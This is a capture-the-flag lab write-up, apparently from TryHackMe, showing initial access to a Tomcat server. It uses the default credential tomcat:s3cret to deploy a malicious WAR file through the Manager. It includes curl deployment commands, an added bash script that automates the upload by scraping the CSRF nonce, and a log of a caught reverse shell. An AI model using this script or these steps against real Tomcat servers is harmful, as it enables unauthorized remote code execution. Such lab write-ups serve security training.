Malicious WAR Deployment
Because the target Tomcat instance still accepts a default credential (tomcat:s3cret, the example pair from the Tomcat documentation), the Tomcat Web Application Manager is reachable from the attacking host at the /manager/html endpoint.
Deployment can be done directly from the Manager web page, or from the command line: according to the official Tomcat 8.5 Manager documentation, a WAR file can be deployed remotely with a single HTTP PUT request to the text interface (/manager/text/deploy).
Deployment
┌──(kali㉿kali)-[~/archive/thm/thompson]
└─$ curl --upload-file shell.war 'http://tomcat:s3cret@10.10.206.196:8080/manager/text/deploy?path=/shell'
[...REDACTED...]
<body>
<h1>403 Access Denied</h1>
<p>
You are not authorized to view this page.
</p>
<p>
By default the Manager is only accessible from a browser running on the
same machine as Tomcat. If you wish to modify this restriction, you'll need
to edit the Manager's <tt>context.xml</tt> file.
</p>
<p>
If you have already configured the Manager application to allow access and
you have used your browsers back button, used a saved book-mark or similar
then you may have triggered the cross-site request forgery (CSRF) protection
that has been enabled for the HTML interface of the Manager application. You
will need to reset this protection by returning to the
<a href="/manager/html">main Manager page</a>. Once you
return to this page, you will be able to continue using the Manager
appliction's HTML interface normally. If you continue to see this access
denied message, check that you have the necessary permissions to access this
application.
</p>
<pre>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
</pre>
<p>
Note that for Tomcat 7 onwards, the roles required to use the manager
application were changed from the single <tt>manager</tt> role to the
following four roles. You will need to assign the role(s) required for
the functionality you wish to access.
</p>
<ul>
<li><tt>manager-gui</tt> - allows access to the HTML GUI and the status
pages</li>
<li><tt>manager-script</tt> - allows access to the text interface and the
status pages</li>
<li><tt>manager-jmx</tt> - allows access to the JMX proxy and the status
pages</li>
<li><tt>manager-status</tt> - allows access to the status pages only</li>
</ul>
[...REDACTED...]
Uploading the WAR payload via the text interface failed with 403. As the error page itself lists, the text interface (/manager/text/*) requires the manager-script role, while the HTML interface (/manager/html) requires manager-gui. The remote-address restriction mentioned on the page is not the cause here, since /manager/html was already reachable from the attacking host; the tomcat account evidently holds manager-gui only and not manager-script.
Deploying the WAR payload via the web GUI instead, which only needs the manager-gui role
Uploaded
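The two deployment paths above (text interface when manager-script is held, HTML interface when only manager-gui is held) can both be driven from the command line. The script below is an added example and is not part of the original write-up or of Tomcat itself: it probes the text interface first, and if that returns 403 it reproduces what the browser upload does, i.e. fetches /manager/html to get a session cookie and the CSRF nonce that Tomcat's CsrfPreventionFilter embeds in every link (query parameter org.apache.catalina.filters.CSRF_NONCE, 32 uppercase hex characters), then POSTs the WAR as the form field deployWar. The sample HTML fragment used for the offline check is constructed, and the host, credential and context path are assumed to be the ones from this write-up.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): deploy a WAR to the Tomcat
# Manager from the command line, preferring the text interface (manager-script)
# and falling back to the HTML interface (manager-gui only), which is the path
# a browser upload takes. Works under bash and POSIX sh (no bash-only syntax).
set -eu

# Constructed sample of what a /manager/html page contains: every link carries
# the CSRF nonce that a subsequent POST to /manager/html/upload must echo back.
SAMPLE_PAGE='<a href="/manager/html/list?org.apache.catalina.filters.CSRF_NONCE=0123456789ABCDEF0123456789ABCDEF">List Applications</a>'

# Extract the CSRF nonce (32 uppercase hex chars) from a manager HTML page.
# Prints nothing when the page has no nonce (e.g. a 401/403 error page).
extract_nonce() {
  printf '%s\n' "$1" \
    | sed -n 's/.*org\.apache\.catalina\.filters\.CSRF_NONCE=\([0-9A-F]\{32\}\).*/\1/p' \
    | head -n 1
}

# Build the HTML-interface upload URL for a base URL and a nonce.
upload_url() {
  printf '%s/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=%s' "$1" "$2"
}

# Map the HTTP status of a /manager/text/* probe to a diagnosis of the account.
# 403 means authenticated but lacking manager-script (or blocked by the
# RemoteAddrValve in the manager's context.xml); 401 means bad credentials.
diagnose_text_status() {
  case "$1" in
    200) echo "manager-script" ;;
    401) echo "bad-credentials" ;;
    403) echo "no-manager-script" ;;
    *)   echo "unknown" ;;
  esac
}

# deploy BASE_URL USER:PASS WAR_FILE CONTEXT_PATH
deploy() {
  base="$1"; creds="$2"; war="$3"; ctx="$4"
  code=$(curl -s -o /dev/null -w '%{http_code}' -u "$creds" "$base/manager/text/list")
  if [ "$(diagnose_text_status "$code")" = "manager-script" ]; then
    # Text interface: a single PUT, as in the official Tomcat Manager docs.
    curl -s -u "$creds" --upload-file "$war" \
      "$base/manager/text/deploy?path=$ctx&update=true"
    return 0
  fi
  echo "text interface returned $code ($(diagnose_text_status "$code")); trying HTML interface" >&2
  jar=$(mktemp)
  trap "rm -f '$jar'" EXIT
  # The nonce is tied to the session, so the JSESSIONID cookie from this GET
  # must be sent with the upload POST (cookie jar -c/-b).
  page=$(curl -s -u "$creds" -c "$jar" -b "$jar" "$base/manager/html")
  nonce=$(extract_nonce "$page")
  if [ -z "$nonce" ]; then
    echo "no CSRF nonce in /manager/html response; account lacks manager-gui too?" >&2
    return 1
  fi
  curl -s -u "$creds" -b "$jar" -c "$jar" \
    -F "deployWar=@$war;type=application/octet-stream" \
    "$(upload_url "$base" "$nonce")" \
    | grep -o 'OK - Deployed application at context path [^<]*' \
    || { echo "HTML deploy did not report success" >&2; return 1; }
}

# Run only when called with arguments, e.g. (values assumed from this write-up):
#   ./tomcat_deploy.sh http://10.10.206.196:8080 tomcat:s3cret shell.war /shell
if [ "$#" -eq 4 ]; then
  deploy "$1" "$2" "$3" "$4"
fi
```

After a successful deploy either path prints "OK - Deployed application at context path [/shell]", and the context can be confirmed with the same `curl -i http://$IP:8080/shell/` check used below.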
┌──(kali㉿kali)-[~/archive/thm/thompson]
└─$ curl -i http://$IP:8080/shell/
HTTP/1.1 200
Set-Cookie: JSESSIONID=31D0682EECAABD08B92A0F0E8D0549A7;path=/shell;HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6
Date: Fri, 12 Jul 2024 10:39:14 GMT
Triggering the uploaded WAR payload
┌──(kali㉿kali)-[~/archive/thm/thompson]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.9.2.95] from (UNKNOWN) [10.10.206.196] 38656
whoami
tomcat
hostname
ubuntu
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:06:04:b4:07:01 brd ff:ff:ff:ff:ff:ff
inet 10.10.206.196/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::6:4ff:feb4:701/64 scope link
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the tomcat user, via a malicious WAR file deployed through the Tomcat Manager with the default credential.